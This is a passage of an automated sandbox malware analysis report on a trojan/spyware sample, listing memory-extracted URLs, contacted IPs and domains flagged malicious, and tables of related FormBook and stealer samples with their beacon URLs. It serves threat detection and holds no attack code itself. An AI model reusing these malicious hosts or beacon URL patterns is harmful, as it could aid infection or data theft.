                                                                                                                  https://www.iv.lt/vps-serveriai/replace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://d1di2lzuh97fh2.cloudfront.net/files/32/32i/32i65q.css?ph=cb3a78e957replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://d1di2lzuh97fh2.cloudfront.net/files/4a/4a3/4a3t1k.css?ph=cb3a78e957replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://klientams.iv.lt/replace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://arsys.es/css/parking2.cssreplace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://www.webnode.com/it/?utm_source=text&amp;utm_medium=footer&amp;utm_content=wnd2&amp;utm_campareplace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://www.arsys.es/hosting/revendedores?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=rereplace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://www.fontbureau.com/designersGMR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://d1di2lzuh97fh2.cloudfront.net/files/13/13s/13s9j7.css?ph=cb3a78e957replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://d1di2lzuh97fh2.cloudfront.net/files/01/01h/01hx1m.css?ph=cb3a78e957replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://www.fontbureau.com/designers/?MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://www.founder.com.cn/cn/bTheMR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        https://www.arsys.es?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=arsysreplace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://www.fontbureau.com/designers?MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://d1di2lzuh97fh2.cloudfront.net/files/1a/1an/1anfpg.css?ph=cb3a78e957replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://www.arsys.es/servidores/cloud?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=cloudreplace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://d1di2lzuh97fh2.cloudfront.net/files/04/04p/04pi85.css?ph=cb3a78e957replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://www.arsys.es/servidores/dedicados?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dereplace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://events.webnode.com/projects/-/events/replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://www.tiro.comMR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      		unknown
                                                                                                                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=replace.exe, 00000006.00000003.2159480486.0000000007F48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://d1di2lzuh97fh2.cloudfront.net/files/07/07f/07fzq8.svg?ph=cb3a78e957replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://www.goodfont.co.krMR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://d1di2lzuh97fh2.cloudfront.net/files/3f/3f9/3f9vvf.css?ph=cb3a78e957replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://www.typography.netDMR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            		unknown
                                                                                                                                                            https://assets.iv.lt/default.cssreplace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://www.galapagosdesign.com/staff/dennis.htmMR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              		unknown
                                                                                                                                                              https://assets.iv.lt/images/icon.pngfirefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchreplace.exe, 00000006.00000003.2159480486.0000000007F48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://www.arsys.es/backup?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=backupreplace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://www.arsys.es/hosting?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=hostingreplace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://www.fonts.comMR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://www.sandoll.co.krMR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e957DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://www.sakkal.comMR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://www.iv.lt/talpinimo-planai/replace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://www.arsys.es/dominios/gestion?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=resellreplace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://www.apache.org/licenses/LICENSE-2.0MR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://www.fontbureau.comMR-239-1599-A.scr.exe, 00000000.00000002.1653756559.0000000006E82000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://www.arsys.es/dominios/ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=sslreplace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoreplace.exe, 00000006.00000003.2159480486.0000000007F48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://d1di2lzuh97fh2.cloudfront.net/files/2v/2v4/2v414g.css?ph=cb3a78e957replace.exe, 00000006.00000002.4094316967.00000000050CC000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000003F1C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://www.iv.lt/neribotas-svetainiu-talpinimas/replace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://www.iv.lt/svetainiu-kurimo-irankis/replace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://www.arsys.es/crear/tienda?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=tiendasreplace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://www.chiark.greenend.org.uk/~sgtatham/putty/0MR-239-1599-A.scr.exefalse
                                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              https://www.arsys.es/partners?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=partnersreplace.exe, 00000006.00000002.4094316967.00000000042AA000.00000004.10000000.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.00000000030FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://www.iv.lt/el-pasto-filtras/replace.exe, 00000006.00000002.4094316967.0000000003DF4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000006.00000002.4096081074.0000000006490000.00000004.00000800.00020000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000002.4093206360.0000000002C44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2262693951.000000003EEA4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://ac.ecosia.org/autocomplete?q=replace.exe, 00000006.00000003.2159480486.0000000007F48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high

                                                                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                                                    Public IPs

                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                    13.94.60.40
                                                                                                                                                                                                    		fix01.pfw.djamxtvyk.cloudland3.comUnited States
                                                                                                                                                                                                    		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                    162.240.81.18
                                                                                                                                                                                                    		aprovapapafox.comUnited States
                                                                                                                                                                                                    		46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                                                                                                    103.93.125.69
                                                                                                                                                                                                    		vf3ba6qx.as22566.comHong Kong
                                                                                                                                                                                                    		59371DNC-ASDimensionNetworkCommunicationLimitedHKtrue
                                                                                                                                                                                                    79.98.25.1
                                                                                                                                                                                                    		www.maxiwalls.comLithuania
                                                                                                                                                                                                    		62282RACKRAYUABRakrejusLTtrue
                                                                                                                                                                                                    217.76.128.34
                                                                                                                                                                                                    		www.colchondealquiler.comSpain
                                                                                                                                                                                                    		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                                                                                                    178.211.137.59
                                                                                                                                                                                                    		www.skibinscy-finanse.plUkraine
                                                                                                                                                                                                    		31214TIS-DIALOG-ASRUtrue
                                                                                                                                                                                                    3.73.27.108
                                                                                                                                                                                                    		lb.webnode.ioUnited States
                                                                                                                                                                                                    		16509AMAZON-02UStrue
                                                                                                                                                                                                    64.190.62.22
                                                                                                                                                                                                    		www.paydayloans3.shopUnited States
                                                                                                                                                                                                    		11696NBS11696UStrue
                                                                                                                                                                                                    203.161.46.103
                                                                                                                                                                                                    		www.fairmarty.topMalaysia
                                                                                                                                                                                                    		45899VNPT-AS-VNVNPTCorpVNtrue
                                                                                                                                                                                                    91.195.240.19
                                                                                                                                                                                                    		parkingpage.namecheap.comGermany
                                                                                                                                                                                                    		47846SEDO-ASDEfalse

                                                                                                                                                                                                    General Information

                                                                                                                                                                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                                    Analysis ID:1438436
                                                                                                                                                                                                    Start date and time:2024-05-08 18:19:05 +02:00
                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                    Overall analysis duration:0h 11m 11s
                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                    Number of analysed new started processes analysed:10
                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                    Number of injected processes analysed:2
                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                    Sample name:MR-239-1599-A.scr.exe
                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@9/2@19/10
                                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                                    • Successful, ratio: 75%
                                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                                    • Successful, ratio: 89%
                                                                                                                                                                                                    • Number of executed functions: 184
                                                                                                                                                                                                    • Number of non-executed functions: 281
                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                                                    Warnings

                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                    • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                    • VT rate limit hit for: MR-239-1599-A.scr.exe

                                                                                                                                                                                                    Simulations

                                                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                                    18:19:54API Interceptor1x Sleep call for process: MR-239-1599-A.scr.exe modified
                                                                                                                                                                                                    18:21:04API Interceptor9056490x Sleep call for process: replace.exe modified

                                                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                                                    IPs

                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                    13.94.60.40letter No. 8283 J-80-PM-MRQ-8025-4901.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                      RFQ02212420.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        162.240.81.18letter No. 8283 J-80-PM-MRQ-8025-4901.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • www.aprovapapafox.com/aleu/
                                                                                                                                                                                                        STATEMENT OF ACCOUNT.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • www.tavernadoheroi.store/3g97/?-b=i+yp5adQUIH0VEgsLjLQbdLWEf0YTlGSDXIw4u3g+VG2ev6y5D4E1hL0oESk2gA2rBhm9fxiezQ8IT1HT+LmzexSq5i7d/OJbgFtFBHCclBl82tv+w==&iJdtI=UBp4nvRH
                                                                                                                                                                                                        Order List.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                        • www.tintasmaiscor.com/a42m/
                                                                                                                                                                                                        Inv 070324.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • www.tavernadoheroi.store/f8eq/
                                                                                                                                                                                                        Payment Advice MT1034354.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                        • www.tintasmaiscor.com/a42m/
                                                                                                                                                                                                        BE.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • www.agoraeubebo.com/nrup/
                                                                                                                                                                                                        Arrival Notice.docGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • www.agoraeubebo.com/nrup/
                                                                                                                                                                                                        RFQ02212420.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • www.aprovapapafox.com/aleu/
                                                                                                                                                                                                        PI No. LI-4325.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • www.aprovapapafox.com/aleu/
                                                                                                                                                                                                        SecuriteInfo.com.Exploit.ShellCode.69.20357.30006.rtfGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • www.agoraeubebo.com/nrup/
                                                                                                                                                                                                        103.93.125.69factura-20240G000009.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                        • www.86597.vip/op6t/
                                                                                                                                                                                                        RFQ02212420.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • www.83634.cn/aleu/
                                                                                                                                                                                                        confirmation de cuenta.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                        • www.86597.vip/op6t/
                                                                                                                                                                                                        PI No. LI-4325.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • www.83634.cn/aleu/
                                                                                                                                                                                                        79.98.25.1Dagtjenesternes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                        • www.maxiwalls.com/udud/
                                                                                                                                                                                                        Udskriftsskemaernes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                        • www.maxiwalls.com/udud/
                                                                                                                                                                                                        International Bank Transfer.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • www.noxnoxhome.com/ve92/?KVvTZtEp=3Lb7GTp0i1UWz50Z1NTpZr264EbzejLIOiMk55K1X/ijp3vnWUvEjglcNSm79P5Sc0NLZLCPEw==&ixo=GL0X
                                                                                                                                                                                                        International Bank transfer.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • www.noxnoxhome.com/ve92/?UTU=yvUt0Xc&NtBTjpl=3Lb7GTp0i1UWz50Z1NTpZr264EbzejLIOiMk55K1X/ijp3vnWUvEjglcNReS0v1pTCwd
                                                                                                                                                                                                        00726736625241525.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                                                        • www.christmatoy.com/6qne/?T6d7v=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/C+oTtjVbLxPInHRTKy1tLVwIe&P9I=5Nqp
                                                                                                                                                                                                        Ekli_fatura.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                                                        • www.christmatoy.com/6qne/?a_=u7nXv&67=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/CzKXxpHTL6/QrDg==
                                                                                                                                                                                                        00023134214252615.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                                                        • www.christmatoy.com/6qne/?0hnL5J=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/BqbXsjSn19dkaRA==&1d=iNJ5G
                                                                                                                                                                                                        Kopija_bankovne_uplate.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                                                        • www.christmatoy.com/6qne/?ibHgv7=x5rx0ZN3oO-G&wO8WV=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/C+oTtjVbLxPInHRTKy1tLVwIe
                                                                                                                                                                                                        003786546788765.PDF.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                                                        • www.christmatoy.com/6qne/?F_4=9SV3rDO4hnDB&U3mb=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/Bqbjoiin18dsOQQ==
                                                                                                                                                                                                        Copie_de_plata_bancara.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                                                        • www.christmatoy.com/6qne/?ILqh=0AsVJSkSvC6-W&yRBmiBA-=45MeeAD4Y8e2mqpl94/vp49GzIZF/JSgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/BqZm0t1L18dsSRA==

                                                                                                                                                                                                        Domains

                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        parkingpage.namecheap.comScries.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                        • 91.195.240.19
                                                                                                                                                                                                        NdYuOgHbM9.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • 91.195.240.19
                                                                                                                                                                                                        5HR6GXEamJ.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                        • 91.195.240.19
                                                                                                                                                                                                        Fyge206.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                        • 91.195.240.19
                                                                                                                                                                                                        Order confirmation F20 - 011 PURCHASE ORDER.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 91.195.240.19
                                                                                                                                                                                                        RE Draft BL for BK#440019497 REF#388855.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                        • 91.195.240.19
                                                                                                                                                                                                        kargonuzu do#U011frulay#U0131n_05082024-Ref_#0123647264823.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • 91.195.240.19
                                                                                                                                                                                                        SARAY_RECEIPT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                        • 91.195.240.19
                                                                                                                                                                                                        Dagtjenesternes.exeGet hashmaliciousFormBook, GuLoaderBrowse
